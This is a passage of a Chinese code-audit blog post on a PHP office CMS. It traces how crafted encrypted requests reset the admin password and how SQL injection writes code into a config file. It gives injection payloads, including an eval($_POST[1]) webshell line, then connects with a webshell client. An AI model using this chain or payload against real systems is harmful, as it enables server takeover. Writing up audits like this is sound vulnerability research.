<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;msgtype&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;msgevent&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;user&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;mobile&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>根据msgtype的构造值不同，可以进行不同的操作，至此，在不需要sql注入漏洞的情况下已经可以修改管理员密码了</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228142843456.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228143135857.png" srcset="/img/loading.gif" lazyload></p>
<p>发送加密后字符串：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228143220713.png" srcset="/img/loading.gif" lazyload></p>
<p>使用新密码666直接登陆后台：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228143250664.png" srcset="/img/loading.gif" lazyload></p>
<p>当然我们不止步于此，能sql注入的地方，为什么要放过他们呢？</p>
<p>这里出现了多个m()方法，是什么？跟进去看下</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228144054718.png" srcset="/img/loading.gif" lazyload></p>
<p>分析一波可以知道是把&#x2F;webmain&#x2F;model&#x2F;下的php文件包含起来了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">m</span>(<span class="hljs-params"><span class="hljs-variable">$name</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$cls</span>      = <span class="hljs-literal">NULL</span>;<br>    <span class="hljs-variable">$pats</span>     = <span class="hljs-variable">$nac</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br>    <span class="hljs-variable">$nas</span>      = <span class="hljs-variable">$name</span>;<br>    <span class="hljs-variable">$asq</span>      = <span class="hljs-title function_ invoke__">explode</span>(<span class="hljs-string">&#x27;:&#x27;</span>, <span class="hljs-variable">$nas</span>);<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">count</span>(<span class="hljs-variable">$asq</span>)&gt;<span class="hljs-number">1</span>)&#123;<br>       <span class="hljs-variable">$nas</span>   = <span class="hljs-variable">$asq</span>[<span class="hljs-number">1</span>];<br>       <span class="hljs-variable">$nac</span>   = <span class="hljs-variable">$asq</span>[<span class="hljs-number">0</span>];<br>       <span class="hljs-variable">$pats</span>  = <span class="hljs-variable">$nac</span>.<span class="hljs-string">&#x27;/&#x27;</span>;<br>       <span class="hljs-variable">$_pats</span> = <span class="hljs-string">&#x27;&#x27;</span>.ROOT_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.PROJECT.<span class="hljs-string">&#x27;/model/&#x27;</span>.<span class="hljs-variable">$nac</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$nac</span>.<span class="hljs-string">&#x27;.php&#x27;</span>;<br>       <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$_pats</span>))&#123;<br>          <span class="hljs-keyword">include_once</span>(<span class="hljs-variable">$_pats</span>);<br>          <span class="hljs-variable">$class</span> = <span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-variable">$nac</span>.<span class="hljs-string">&#x27;Model&#x27;</span>;<br>          <span class="hljs-variable">$cls</span>   = <span class="hljs-keyword">new</span> <span class="hljs-variable">$class</span>(<span class="hljs-variable">$nas</span>);<br>       &#125;  <br>    &#125;<br>    <span class="hljs-variable">$class</span>    = <span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-variable">$nas</span>.<span class="hljs-string">&#x27;ClassModel&#x27;</span>;<br>    <span class="hljs-variable">$path</span>     = <span class="hljs-string">&#x27;&#x27;</span>.ROOT_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.PROJECT.<span class="hljs-string">&#x27;/model/&#x27;</span>.<span class="hljs-variable">$pats</span>.<span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-variable">$nas</span>.<span class="hljs-string">&#x27;Model.php&#x27;</span>;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$path</span>))&#123;<br>       <span class="hljs-keyword">include_once</span>(<span class="hljs-variable">$path</span>);<br>       <span class="hljs-keyword">if</span>(<span class="hljs-variable">$nac</span>!=<span class="hljs-string">&#x27;&#x27;</span>)<span class="hljs-variable">$class</span>= <span class="hljs-variable">$nac</span>.<span class="hljs-string">&#x27;_&#x27;</span>.<span class="hljs-variable">$class</span>;<br>       <span class="hljs-variable">$cls</span>   = <span class="hljs-keyword">new</span> <span class="hljs-variable">$class</span>(<span class="hljs-variable">$nas</span>);<br>    &#125;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$cls</span>==<span class="hljs-literal">NULL</span>)<span class="hljs-variable">$cls</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">sModel</span>(<span class="hljs-variable">$nas</span>);<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$cls</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>追踪到底层其实是调用&#x2F;include&#x2F;class&#x2F;mysql.php里的数据库操作函数：</p>
<p>getmou()获取table(此处table由m的构造函数传参决定，传入admin就对xinhu_admin表进行操作)中$where处的$fields的值</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228145714030.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getmou</span>(<span class="hljs-params"><span class="hljs-variable">$table</span>,<span class="hljs-variable">$fields</span>,<span class="hljs-variable">$where</span>,<span class="hljs-variable">$order</span>=<span class="hljs-string">&#x27;&#x27;</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$sql</span>   = <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">getsql</span>(<span class="hljs-keyword">array</span>(<br>       <span class="hljs-string">&#x27;table&#x27;</span>    =&gt; <span class="hljs-variable">$table</span>,<br>       <span class="hljs-string">&#x27;where&#x27;</span>    =&gt; <span class="hljs-variable">$where</span>,<br>       <span class="hljs-string">&#x27;fields&#x27;</span>=&gt; <span class="hljs-variable">$fields</span>,<br>       <span class="hljs-string">&#x27;order&#x27;</span>    =&gt; <span class="hljs-variable">$order</span><br>    ));<br>    <span class="hljs-variable">$res</span>=<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">query</span>(<span class="hljs-variable">$sql</span>);<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$res</span>)&#123;<br>       <span class="hljs-variable">$row</span> = <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">fetch_array</span>(<span class="hljs-variable">$res</span>, <span class="hljs-number">1</span>);<br>       <span class="hljs-keyword">if</span>(<span class="hljs-variable">$row</span>)&#123;<br>          <span class="hljs-variable language_">$this</span>-&gt;count = <span class="hljs-number">1</span>;<br>          <span class="hljs-keyword">return</span> <span class="hljs-variable">$row</span>[<span class="hljs-number">0</span>];<br>       &#125;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>update()更新table(同getmou()中指定方式相同)表中$where处$array的值，没有则新增</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228145747190.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228150832035.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">record</span>(<span class="hljs-params"><span class="hljs-variable">$table</span>,<span class="hljs-variable">$array</span>,<span class="hljs-variable">$where</span>=<span class="hljs-string">&#x27;&#x27;</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$addbool</span>   = <span class="hljs-literal">true</span>;<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">isempt</span>(<span class="hljs-variable">$where</span>))<span class="hljs-variable">$addbool</span>=<span class="hljs-literal">false</span>;<br>    <span class="hljs-variable">$cont</span>     = <span class="hljs-string">&#x27;&#x27;</span>;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$array</span>))&#123;<br>       <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$array</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$key</span>=&gt;<span class="hljs-variable">$val</span>)&#123;<br>          <span class="hljs-variable">$cont</span>.=<span class="hljs-string">&quot;,`<span class="hljs-subst">$key</span>`=&quot;</span>.<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">toaddval</span>(<span class="hljs-variable">$val</span>).<span class="hljs-string">&quot;&quot;</span>;<br>       &#125;<br>       <span class="hljs-variable">$cont</span>  = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$cont</span>,<span class="hljs-number">1</span>);<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>       <span class="hljs-variable">$cont</span>  = <span class="hljs-variable">$array</span>;<br>    &#125;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$addbool</span>)&#123;<br>       <span class="hljs-variable">$sql</span>=<span class="hljs-string">&quot;insert into `<span class="hljs-subst">$table</span>` set <span class="hljs-subst">$cont</span>&quot;</span>;<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>       <span class="hljs-variable">$where</span> = <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">getwhere</span>(<span class="hljs-variable">$where</span>);<br>       <span class="hljs-variable">$sql</span>=<span class="hljs-string">&quot;update `<span class="hljs-subst">$table</span>` set <span class="hljs-subst">$cont</span> where <span class="hljs-subst">$where</span>&quot;</span>;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">tranbegin</span>(<span class="hljs-variable">$sql</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>至此我们回到上面的cogClassAction.php，我们可以通过sql注入更新管理员的名字，思考如何构造？</p>
<p>要执行我们自己插入的rce代码，首先要脱离注释符，那就需要一个”\n”，然后插入完想执行的的php代码后，再用注释符注释掉后面多余的代码。</p>
<p>eg：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">\<span class="hljs-built_in">nphpinfo</span>();<span class="hljs-comment">//</span><br></code></pre></td></tr></table></figure>

<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228135254312.png" srcset="/img/loading.gif" lazyload></p>
<p>然后写入webmain&#x2F;webmainConfig.php：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228151919165.png" srcset="/img/loading.gif" lazyload></p>
<p>此处会被修改</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228152302420.png" srcset="/img/loading.gif" lazyload></p>
<p>editmobile处比较好操作，editpass也可注入，构造恶意json</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228152750477.png" srcset="/img/loading.gif" lazyload></p>
<p>传入加密字符串：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228152841081.png" srcset="/img/loading.gif" lazyload></p>
<p>admin的名字已经发生变化了：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228152932084.png" srcset="/img/loading.gif" lazyload></p>
<p>这时候需要重新登陆一下让session重置，$adminname才会重置：</p>
<p>这时候包含一下cogAction.php：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228153117484.png" srcset="/img/loading.gif" lazyload></p>
<p>配置文件变成这样了：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228153150926.png" srcset="/img/loading.gif" lazyload></p>
<p>后续测试中发现此处利用点似乎并无法导致getshell，当插入代码如下时：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228153655754.png" srcset="/img/loading.gif" lazyload></p>
<p>重新登陆会提示，还是有比较大局限性的：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228153743589.png" srcset="/img/loading.gif" lazyload></p>
<p>后记：<code>\neval($_POST[1]);//</code>就不会太长了。还是可以getshell的，有了eval之后可执行的代码就大大拓宽了</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228155210653.png" srcset="/img/loading.gif" lazyload></p>
<p>蚁剑连接：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228155414056.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/12/30/CVE-2023-41892%E5%88%86%E6%9E%90/" title="CVE-2023-41892分析">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CVE-2023-41892分析</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/11/30/some-idea/" title="some_idea">
                        <span class="hidden-mobile">some_idea</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://potatowo233.github.io/" target="_blank" rel="nofollow noopener"><span>Potat0w0</span></a> <i class="iconfont icon-love"></i>

    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/click.js"></script>
<script src="/js/snow.js"></script>
<script src="/js/potato.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
